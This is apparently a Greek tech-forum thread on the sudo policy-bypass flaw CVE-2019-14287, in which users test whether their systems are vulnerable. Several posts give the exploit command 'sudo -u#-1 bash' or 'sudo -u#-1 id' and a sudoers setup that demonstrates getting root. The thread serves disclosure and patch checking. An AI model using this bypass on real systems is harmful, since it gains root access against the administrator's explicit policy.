Όλες οι εκδόσεις του Sudo πριν την 1.8.28, έχουν ευπάθεια στο security policy bypass, επιτρέποντας την εκτέλεση εντολών σαν root, ακόμα και αν ο λογαριασμός που χρησιμοποιείται απαγορεύει ρητά την root πρόσβαση.
Η ευπάθεια με CVE-2019-14287, μπορεί να γίνει αντικείμενο εκμετάλλευσης, βάζοντας σαν userID το "-1" ή το "4294967295". Το utility που μετατρέπει το user ID σε username, χειρίζεται λανθασμένα αυτούς τους 2 αριθμούς σαν τον αριθμό 0 -με το user ID 0 να είναι πάντα ο χρήστης root.By default on most Linux distributions, the ALL keyword in RunAs specification in /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system.
However, since privilege separation is one of the fundamental security paradigms in Linux, administrators can configure a sudoers file to define which users can run what commands as to which users.
So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and take complete control over the system.
"This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification," the Sudo developers say.
"Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run."
Πηγή : The Hacker News
Εμφάνιση 1-15 από 25
-
15-10-19, 10:08 Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #1
- Εγγραφή
- 22-09-2003
- Μηνύματα
- 81.848
- Downloads
- 218
- Uploads
- 48
- Άρθρα
- 6
- Τύπος
- VDSL2
- Ταχύτητα
- 204800/20480
- ISP
- Wind
- Router
- Technicolor DGA4130
- SNR / Attn
- 6(dB) / 2.8(dB)
- Path Level
- Interleaved
-
15-10-19, 10:53 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #2
Σε Debian αναβαθμίστηκε εχθές.
-
15-10-19, 10:53 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #3
Μάλλον το δικό μου πατσαρίστηκε γρήγορα.
Δοκιμάστε το:
Κώδικας:# useradd guest # passwd guest # su guest $ sudo -u#-1 bash
-
15-10-19, 11:05 Re: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #4
Η τρύπα του αιώνα?
Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..
Εθνικισμός και μετανάστες
Μία τάξη, φυλετικά διαχωρισμένη
-
15-10-19, 11:23 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #5
Δεν ξέρω,
άλλα ένα redhat 7.4 me sudo 1.8.19p2 δεν μου έδωσε access
Κώδικας:[xxx@yyy ~]$ sudo -u#-1 bash [sudo] password for xxx: Sorry, user xxx is not allowed to execute '/bin/bash' as #-1 on yyy. [xxx@yyy ~]$ sudo -u\#-1 bash [sudo] password for xxx: Sorry, user xxxis not allowed to execute '/bin/bash' as #-1 on yyy. [xxx@yyy ~]$ sudo -V Sudo version 1.8.19p2 Sudoers policy plugin version 1.8.19p2 Sudoers file grammar version 45 Sudoers I/O plugin version 1.8.19p2 [xxx@yyy ~]$ cat /etc/redhat-release Red Hat Enterprise Linux Server release 7.4 (Maipo)
Τελευταία επεξεργασία από το μέλος papako : 15-10-19 στις 11:28.
-
15-10-19, 11:36 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #6
Και σε εμένα ήταν η 1.8.27 τελικά αλλα δεν δούλευε.
-
15-10-19, 11:55 Re: Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #7xxx:~# useradd guest
xxx:~# passwd guest
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
xxx:~# su guest
$ sudo -u#-1 bash
[sudo] password for guest:
Sorry, user guest is not allowed to execute '/bin/bash' as #-1 on xxx.
Sudo version 1.8.21p2Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..
Εθνικισμός και μετανάστες
Μία τάξη, φυλετικά διαχωρισμένη
-
15-10-19, 12:06 Απάντηση: Re: Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #8
-
15-10-19, 13:17 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #9
Σε Arch με 1.8.27-1 δεν δούλεψε.
Από ότι είδα στο αρχείο sudoers δεν είχα "ενεργό" το
Κώδικας:%sudo ALL=(ALL) ALL
Τελευταία επεξεργασία από το μέλος GigaSat : 15-10-19 στις 13:30.
-
15-10-19, 13:36 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #10
Οκ δούλεψε σε fedora με 1.8.27
Θέλει edit το sudoers
Κώδικας:# visudo
Κώδικας:# Προσθέστε αυτή τη γραμμή guest myhost=(ALL,!root) /usr/bin/id
Κώδικας:# as guest $ sudo id Sorry, user guest is not allowed to execute '/usr/bin/id' as root on myhost. $ sudo -u#-1 id uid=0(root) gid=1001(guest)...
Τελευταία επεξεργασία από το μέλος Eruyome(MMXGN) : 15-10-19 στις 13:44.
-
15-10-19, 15:41 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #11
Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.
Η σοβαρή εντολή ανέκαθεν ήταν η su -.Επιτέλους το ελάχιστο δυνατό, ευέλικτο, και ψηφιακό κράτος. Με διαρκή αξιολόγηση.
-
15-10-19, 17:03 Re: Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #12
Συμφωνώ, σε gentoo ποτέ δεν το χρειάστηκα, μέχρι πρότινος όμως που έπρεπε να εκτελώ scripts ως απλός χρήστης χωρίς να είμαι αναγκασμένος να έχω interaction για password. Αναγκαίο κακό επομένως, για κάποιες περιπτώσεις.
Βέβαια έχω απομονώσει συγκεκριμένες εντολές που επιτρέπεται να εκτελεί ο απλός χρήστης, οπότε είναι κάπως καλύτερα απ'το default
"%sudo ALL=(ALL) ALL".Dealing with pricks, is my speciality.
Linux all the way.
Open source all the way.
Fighting against telemetry, data harvesting, tracking, ads all the way.
For some people, ignorance is bliss.
-
15-10-19, 17:36 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #13
Τελευταία επεξεργασία από το μέλος xhaos : 15-10-19 στις 17:42.
See first, think later, then test. But always see first. Otherwise you will only see what you were expecting. Most scientists forget that. - Douglas Adams
There's no right, there's no wrong, there's only popular opinion. - Jeffrey Goines (12 Monkeys)
-
15-10-19, 18:01 Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #14
-
15-10-19, 18:37 Απάντηση: Re: Απάντηση: Ευπάθεια του Sudo επιτρέπει εκτέλεση εντολών σαν root από μη εξουσιοδοτημένους χρήστες #15NetBSD Rocks!
http://www.netbsd.org
Bookmarks